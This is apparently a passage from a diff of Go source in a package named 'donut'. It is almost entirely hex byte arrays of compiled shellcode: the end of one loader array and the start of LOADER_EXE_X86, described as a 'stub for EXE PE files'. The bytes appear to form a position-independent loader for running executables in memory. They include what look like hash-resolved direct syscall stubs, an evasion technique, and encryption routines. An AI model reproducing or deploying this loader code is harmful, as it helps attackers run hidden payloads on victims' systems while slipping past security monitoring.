2284 0x83, 0xe8, 0x01, 0x39, 0x45, 0xd8, 0x0f, 0x82, 0xe0, 0xfe, 0xff, 0xff,
2285 0x83, 0x45, 0xdc, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x83, 0xe8,
2286 0x01, 0x39, 0x45, 0xdc, 0x0f, 0x82, 0xbe, 0xfe, 0xff, 0xff, 0xb8, 0x01,
2287 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xc8, 0x00, 0x00, 0x00, 0x5b, 0x5d,
2288 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x89, 0x4d, 0x10,
2289 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8,
2290 0xff, 0xff, 0xff, 0xff, 0xeb, 0x49, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89,
2291 0xc1, 0xe8, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0xff,
2292 0xff, 0xff, 0xff, 0xeb, 0x32, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00,
2293 0xeb, 0x19, 0x48, 0x8b, 0x45, 0x18, 0x8b, 0x55, 0xfc, 0x8b, 0x44, 0xd0,
2294 0x04, 0x39, 0x45, 0x10, 0x75, 0x05, 0x8b, 0x45, 0xfc, 0xeb, 0x14, 0x83,
2295 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45, 0x18, 0x8b, 0x00, 0x39, 0x45, 0xfc,
2296 0x72, 0xdc, 0xb8, 0xff, 0xff, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x30, 0x5d,
2297 0xc3, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x27, 0x6e, 0x95, 0x32,
2298 0x48, 0x8b, 0x54, 0x24, 0x60, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x7b, 0xff,
2299 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59,
2300 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41,
2301 0x50, 0x41, 0x51, 0xb9, 0x0d, 0x22, 0x5e, 0x03, 0x48, 0x8b, 0x54, 0x24,
2302 0x78, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x4f, 0xff, 0xff, 0xff, 0x48, 0x83,
2303 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2304 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2305 0x42, 0xb8, 0xce, 0x9a, 0x4c, 0x89, 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8,
2306 0x25, 0xff, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2307 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2308 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x53, 0x91, 0x98, 0xf2, 0x4c, 0x89,
2309 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xfb, 0xfe, 0xff, 0xff, 0x48, 0x83,
2310 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2311 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2312 0xd1, 0xd6, 0x9d, 0x34, 0x48, 0x89, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xe8,
2313 0xd1, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2314 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2315 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x23, 0xe1, 0xbd, 0xe3, 0x4c, 0x89,
2316 0xca, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xa7, 0xfe, 0xff, 0xff, 0x48, 0x83,
2317 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2318 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2319 0x17, 0x15, 0x91, 0x0b, 0x48, 0x8b, 0x54, 0x24, 0x50, 0x48, 0x83, 0xec,
2320 0x28, 0xe8, 0x7b, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59,
2321 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f,
2322 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x15, 0x42, 0xb7, 0x1c,
2323 0x4c, 0x89, 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x51, 0xfe, 0xff, 0xff,
2324 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89,
2325 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41,
2326 0x51, 0xb9, 0x4b, 0x47, 0xa5, 0x31, 0x48, 0x8b, 0x54, 0x24, 0x58, 0x48,
2327 0x83, 0xec, 0x28, 0xe8, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28,
2328 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3,
2329 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0xef, 0x7f,
2330 0x90, 0x87, 0x48, 0x8b, 0x54, 0x24, 0x48, 0x48, 0x83, 0xec, 0x28, 0xe8,
2331 0xf9, 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2332 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2333 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x2a, 0xfe, 0x9d, 0x24, 0x48, 0x8b,
2334 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xca,
2335 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a,
2336 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52,
2337 0x41, 0x50, 0x41, 0x51, 0xb9, 0x39, 0x2b, 0xcf, 0x55, 0x48, 0x8b, 0x54,
2338 0x24, 0x58, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x9e, 0xfd, 0xff, 0xff, 0x48,
2339 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca,
2340 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
2341 0xb9, 0x93, 0x76, 0x29, 0x34, 0x48, 0x8b, 0x94, 0x24, 0x80, 0x00, 0x00,
2342 0x00, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x6f, 0xfd, 0xff, 0xff, 0x48, 0x83,
2343 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2344 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2345 0xf7, 0xc9, 0xac, 0xff, 0x4c, 0x89, 0xca, 0x48, 0x83, 0xec, 0x28, 0xe8,
2346 0x45, 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2347 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x90,
2348 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2349 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
2350 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00,
2351 0x00, 0x00, 0x00, 0xeb, 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85,
2352 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b,
2353 0x10, 0x8b, 0x45, 0xfc, 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01,
2354 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
2355 0x00, 0xeb, 0x5e, 0x8b, 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b,
2356 0x45, 0xdc, 0x01, 0xc2, 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8,
2357 0x8b, 0x45, 0xdc, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31,
2358 0xd0, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45,
2359 0xe4, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33,
2360 0x45, 0xfc, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89,
2361 0xc2, 0x8b, 0x45, 0xec, 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8,
2362 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc,
2363 0x01, 0x83, 0x7d, 0xfc, 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48,
2364 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
2365 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
2366 0x10, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45,
2367 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00,
2368 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9,
2369 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01,
2370 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40,
2371 0x75, 0x73, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc2,
2372 0x48, 0x8d, 0x4d, 0xd0, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xc8, 0x41, 0x89,
2373 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x5e, 0xf5,
2374 0xff, 0xff, 0x8b, 0x45, 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d,
2375 0xf0, 0x0b, 0x76, 0x2b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
2376 0x48, 0x89, 0xc1, 0xe8, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8,
2377 0x48, 0x8d, 0x45, 0xd0, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00,
2378 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x25, 0xf5, 0xff, 0xff, 0x8b,
2379 0x45, 0xf4, 0xc1, 0xe0, 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10,
2380 0x00, 0x00, 0x00, 0x83, 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4,
2381 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2,
2382 0x8b, 0x45, 0xf0, 0x88, 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83,
2383 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55,
2384 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff,
2385 0xff, 0x48, 0x31, 0x45, 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2386 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b,
2387 0x45, 0xf8, 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90,
2388 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2389 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
2390 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10,
2391 0x48, 0x89, 0x45, 0xe8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
2392 0x42, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
2393 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x08, 0x8b, 0x45, 0xfc,
2394 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8,
2395 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x4c, 0x8d, 0x04, 0x85,
2396 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x4c, 0x01, 0xc0, 0x31,
2397 0xca, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76,
2398 0xb8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00,
2399 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2400 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89,
2401 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0xc1,
2402 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b,
2403 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b,
2404 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x48, 0x8b, 0x45, 0xf0,
2405 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2406 0xc0, 0x08, 0x01, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2407 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, 0x08, 0x89, 0xc1, 0x48, 0x8b, 0x45,
2408 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2409 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2410 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2411 0x04, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x01,
2412 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10,
2413 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00,
2414 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0,
2415 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, 0x0d, 0x89, 0xc1, 0x48,
2416 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2417 0x0c, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2418 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x07, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
2419 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2420 0xc0, 0x04, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2421 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08,
2422 0xc1, 0xc2, 0x10, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
2423 0x0f, 0x0f, 0x86, 0xda, 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00,
2424 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00,
2425 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x08,
2426 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
2427 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x4c,
2428 0x8d, 0x04, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x4c,
2429 0x01, 0xc0, 0x31, 0xca, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d,
2430 0xfc, 0x03, 0x76, 0xb8, 0x90, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3,
2431 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10,
2432 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28,
2433 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18,
2434 0x48, 0x89, 0x45, 0xe8, 0xe9, 0xc1, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4,
2435 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45,
2436 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x88, 0x54,
2437 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x76, 0xe2,
2438 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
2439 0xa0, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x28, 0xba, 0x10, 0x00, 0x00, 0x00,
2440 0x39, 0xd0, 0x0f, 0x47, 0xc2, 0x89, 0x45, 0xe4, 0xc7, 0x45, 0xf4, 0x00,
2441 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xf8,
2442 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x08, 0x8b, 0x45, 0xf4, 0x0f, 0xb6, 0x54,
2443 0x05, 0xd0, 0x44, 0x8b, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0xf8, 0x4c, 0x01,
2444 0xc0, 0x31, 0xca, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4,
2445 0x3b, 0x45, 0xe4, 0x72, 0xd0, 0x8b, 0x45, 0xe4, 0x29, 0x45, 0x28, 0x8b,
2446 0x45, 0xe4, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, 0x00, 0x00,
2447 0x00, 0xeb, 0x24, 0x8b, 0x45, 0xf4, 0x83, 0xe8, 0x01, 0x89, 0xc2, 0x48,
2448 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x83, 0xc2, 0x01,
2449 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02, 0xeb, 0x0b, 0x83,
2450 0x6d, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x85, 0xc0, 0x7f, 0xd5, 0x83, 0x7d,
2451 0x28, 0x00, 0x0f, 0x85, 0x35, 0xff, 0xff, 0xff, 0x90, 0x90, 0x48, 0x83,
2452 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
2453 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
2454 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
2455 0x00, 0x00, 0x00, 0x00};
2456
+2055
-0
loader_exe_x86.go less more
0 package donut
1
2 // LOADER_EXE_X86 - stub for EXE PE files
3 var LOADER_EXE_X86 = []byte{
4
5 0x55, 0x89, 0xe5, 0x56, 0x53, 0x81, 0xec, 0x10, 0x03, 0x00, 0x00, 0xc7,
6 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x0c,
7 0x02, 0x00, 0x00, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x89, 0xc6, 0x83,
8 0xf6, 0x00, 0x89, 0xf1, 0x89, 0xd0, 0x80, 0xf4, 0x00, 0x89, 0xc3, 0x89,
9 0xd8, 0x09, 0xc8, 0x85, 0xc0, 0x0f, 0x84, 0x54, 0x01, 0x00, 0x00, 0x8b,
10 0x45, 0x08, 0x8b, 0x50, 0x74, 0x8b, 0x40, 0x70, 0x89, 0x45, 0xe8, 0x89,
11 0x55, 0xec, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89,
12 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xe8, 0x8b, 0x55,
13 0xec, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08,
14 0x89, 0x04, 0x24, 0xe8, 0xb2, 0x11, 0x00, 0x00, 0x89, 0x45, 0xe4, 0x83,
15 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0x98, 0x00, 0x00, 0x00, 0xe8, 0x8e, 0x50,
16 0x00, 0x00, 0xba, 0xa4, 0x11, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
17 0x29, 0xca, 0x01, 0xd0, 0x89, 0xc2, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00,
18 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
19 0x08, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
20 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00,
21 0x8b, 0x45, 0xe4, 0xff, 0xd0, 0x83, 0xec, 0x18, 0x89, 0x45, 0xf4, 0x8b,
22 0x45, 0x08, 0x8b, 0x90, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00,
23 0x00, 0x00, 0x89, 0x45, 0xe8, 0x89, 0x55, 0xec, 0x8b, 0x45, 0x08, 0x8b,
24 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24,
25 0x10, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x89, 0x44, 0x24, 0x04, 0x89,
26 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x1c, 0x11,
27 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xdc, 0x00, 0x0f, 0x84, 0x83,
28 0x00, 0x00, 0x00, 0xeb, 0x07, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xeb, 0x7d,
29 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x74, 0x83, 0x7d, 0xe0, 0x00, 0x74, 0x6e,
30 0xc7, 0x85, 0x0c, 0xfd, 0xff, 0xff, 0x07, 0x00, 0x01, 0x00, 0x8b, 0x45,
31 0xe0, 0xff, 0xd0, 0x8d, 0x95, 0x0c, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24,
32 0x04, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xd8, 0xff, 0xd0, 0x83, 0xec, 0x08,
33 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x80, 0x08,
34 0x02, 0x00, 0x00, 0x89, 0x85, 0xc4, 0xfd, 0xff, 0xff, 0x8b, 0x85, 0xd0,
35 0xfd, 0xff, 0xff, 0x83, 0xe0, 0xfc, 0x89, 0x85, 0xd0, 0xfd, 0xff, 0xff,
36 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0xfd,
37 0xff, 0xff, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xdc, 0xff, 0xd0, 0x83, 0xec,
38 0x08, 0xeb, 0x0b, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0a, 0x00,
39 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8d, 0x65, 0xf8, 0x5b, 0x5e, 0x5d, 0xc3,
40 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x81, 0xec, 0xbc, 0x01, 0x00, 0x00,
41 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x4c, 0x8b, 0x40, 0x48, 0x89, 0x45, 0xd0,
42 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28,
43 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b,
44 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45,
45 0x08, 0x89, 0x04, 0x24, 0xe8, 0x3d, 0x10, 0x00, 0x00, 0x89, 0x45, 0xcc,
46 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x54, 0x8b, 0x40, 0x50, 0x89, 0x45, 0xd0,
47 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28,
48 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b,
49 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45,
50 0x08, 0x89, 0x04, 0x24, 0xe8, 0x01, 0x10, 0x00, 0x00, 0x89, 0x45, 0xc8,
51 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xc4, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xc0,
52 0x01, 0x00, 0x00, 0x89, 0x45, 0xd0, 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08,
53 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54,
54 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b, 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04,
55 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xbf,
56 0x0f, 0x00, 0x00, 0x89, 0x45, 0xc4, 0x83, 0x7d, 0xcc, 0x00, 0x74, 0x0c,
